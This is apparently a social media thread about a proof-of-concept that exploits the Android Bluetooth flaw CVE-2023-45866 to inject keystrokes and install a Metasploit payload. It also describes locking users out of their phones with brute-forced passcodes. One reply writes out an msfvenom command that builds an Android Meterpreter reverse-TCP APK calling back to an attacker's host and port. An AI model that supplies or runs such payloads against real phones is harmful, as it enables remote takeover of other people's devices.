PoC to take over Android using another Android by exploiting critical Bluetooth vulnerability to install #Metasploit payload without proper Bluetooth pairing (CVE-2023-45866). It still affects Android 10 and below mobile-hacker.com/2024/01/23/exp… #NetHunter
In a different 0-click exploit scenario: It is also possible to lock a user out of their smartphone by brute-forcing lock-screen passcodes in a loop to trigger a 30-second and then a 60-second timeout. Injected key-presses are typed way faster than the user taps to unlock the device.
@androidmalware2 Keep up the good work! Hope to see a new PoC video on macOS, iOS and Windows ;)
@androidmalware2 Is victim interaction required to accept the Bluetooth connection with the attacker device?
@androidmalware2 My Android version is 10 on a Xiaomi Redmi Note 7 phone, but when I run the default script that injects tabs for 10 seconds, it does not force pair the phone but requires me to pair it first, which is not zero click. Any idea why this is happening?
@androidmalware2 Android 10 and below? I think @marcnewlin said this will work from Android 4.2.2 to 14 (as long as the latest patches are not installed). I tested this on an unpatched Android 11 (Pixel 3a) and it did work.
@androidmalware2 Sir, while my kernel supports internal Bluetooth, I still have problems with bluebinder. It shows me "Bluetooth binder service failed" .. it detects hci0 but the interface can't be up, it's always down .. 6 months ago the same kernel and same ROM were working fine for other people. Any idea or help?
@androidmalware2 Is there a way to access my network mobile devices to delete some files?
@androidmalware2 How is the process and from where to download?
@androidmalware2 Can I install NetHunter on OnePlus 11R?
@androidmalware2 Can you share the script to inject the Metasploit payload? Thanks
@androidmalware2 I will write a code Msfvenom -p Android/meterpreter/reverse_tcp Lhost=192.168.9 ip address Lport=4444Port number R >Malware.apk *Msfconsole *Meterpreter reverse_tcp *Lhost=192.168.9 Ip address Lport=4444 portnumber *Exploit
@androidmalware2 Tried performing on multiple devices, Android 10, 11, 12, 13, from OnePlus to Xiaomi, Motorola. It pops up pairing notifications and if we don’t accept it, it won’t work. All these devices are not patched. Not sure how the author was able to produce it as zero click.
@androidmalware2 How to detect if Metasploit was installed or not?